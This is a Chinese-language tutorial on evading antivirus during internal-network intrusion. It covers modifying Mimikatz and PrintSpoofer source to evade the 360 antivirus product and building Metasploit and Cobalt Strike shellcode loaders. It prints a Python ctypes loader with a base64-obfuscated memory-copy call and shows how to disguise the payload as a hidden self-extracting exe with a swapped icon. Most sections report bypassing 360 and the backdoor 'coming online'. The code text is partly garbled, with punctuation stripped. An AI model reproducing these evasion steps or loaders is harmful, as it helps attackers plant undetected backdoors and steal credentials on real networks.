内网渗透常用工具免杀
内网渗透常用工具免杀Mimikatz免杀
Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资料很多,这里就不多加介绍了,随着这两年hw行动越来越多,企事业单位也都开始注重内网安全,有预算的会上全套的终端安全、企业版杀软或者EDR,就算没有预算的也会装个360全家桶或者主机卫士之类的,这也导致很多时候你的mimikatz可能都没法拷贝过去或者没有加载执行,拿了台服务器却横向移不动就尴尬了。因为这款工具特别出名所以被查杀的机率很大,我们可以通过github上的开源代码对其进行源码免杀从而bypass反病毒软件。
Mimikatz源代码下载https:github。comgentilkiwimimikatz
免杀步骤
替换mimikatz关键字shenghuo
mimikatz下的文件全部改为shenghu
把项目里所有的文件注释去掉
BenjaminDELPYgentilkiwihttp:blog。gentilkiwi。combenjamingentilkiwi。comLicence:https:creativecommons。orglicensesby4。0
打开红色框框内的内容,替换图标文件
出现无法找到v140的生成工具(平台工具集v140),要选择自己安装的平台工具集
重新生成
生成的程序能够正确运行
成功过360
PrintSpoofer做免杀
printspoofer提权工具目前主流的提权工具之一,360安全会自动查杀,其他杀毒软件并不会查杀。
源码下载地址:
https:github。comitm4nPrintSpoofer
将PrintSpoofer。cpp里面的输出帮助文档全部清空
导入图标
重新生成,程序生成成功
成功过360
msf免杀
metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。MetasploitFramework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode编写和漏洞研究提供了一个可靠平台。其中攻击载荷模块(Payload),在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且Metasploit还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混淆绕过一部分杀毒软件。
工具DevCpp5。11TDMGCC4。9。2Setup下载地址https:sourceforge。netprojectsorwelldevcpp
metasploit源码下载:metasploitloadermastersrcmain。c
选择:文件新建项目consoleApplicationc项目
把winsock2。h移动到windows。h上不然编译会出错。
将这四处的数字改为其他数字
设置攻击载荷,执行后成功上线
成功过360
Python3对Cobaltstrike的shellcode做免杀
生成python64位的shellcode
添加生成的shellcodeimportctypesimportbase64shellcode加载defshellCodeLoad(shellcode):ctypes。windll。kernel32。VirtualAlloc。restypectypes。cuint64ptrctypes。windll。kernel32。VirtualAlloc(ctypes。cint(0),ctypes。cint(len(shellcode)),ctypes。cint(0x3000),ctypes。cint(0x40))buf(ctypes。ccharlen(shellcode))。frombuffer(shellcode)eval(base64。b64decode(Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ))handlectypes。windll。kernel32。CreateThread(ctypes。cint(0),ctypes。cint(0),ctypes。cuint64(ptr),ctypes。cint(0),ctypes。cint(0),ctypes。pointer(ctypes。cint(0)))ctypes。windll。kernel32。WaitForSingleObject(ctypes。cint(handle),ctypes。cint(1))ifnamemain:shellCodeLoad(bytearray(b你的shellcode))这里为你的添加的shellcode位置
编译成程序
pyinstallerFtest。pynoconsole
此时还要做的就是更改图标,这里介绍一种方法
首先右击它,选择添加到压缩文件
在弹出来的一个压缩文件名和参数框中设置压缩文件格式为ZIP,压缩方式为存储,压缩选项为创建自解压格式压缩文件。
随后选择高级选项卡。选择了高级选项卡以后直接点击自解压选项
在设置选项卡中解压后运行对应程序
在模式选项卡中选择解压临时文件夹和全部隐藏
随后再选择更新选项卡,在覆盖方式中选择覆盖所有文件
最后选择文本和图标选项卡,在自定义自解压文件徽标和图标中选择从文件加载自解压文件图标,点击浏览,找到自己想要加载的图标文件后并打开
然后就点击确定(两次)就可以生成一个新的exe程序了。图标已经改变了,再运行测试一下
上传去目标主机,这里更改了程序名称
在线查杀
cxor加载器免杀cobaltstrike的shellcode
是很流行的编程语言,也可以用它来做一个加载器运行cobaltstrike的shellcode,生成出来的文件特别的小,可以很好地投递传输。
项目地址https:github。comantman1pShellCodeRunner用vs2017打开sln项目文件
选择xorkryptor生成编码器用cobaltstrike生成raw二进制文件
encrypt。bin就是经过编码后的文件
项目里面存有Rsources和encrypt。bin文件事实上项目是没有这个文件夹和文件所以在当前目录新建文件夹和将生成好的shellcode文件encrypt。bin复制到文件夹里。右键选择编译文件即可。
此时文件正常
重新编译,成功生成后门程序
成功过360
成功上线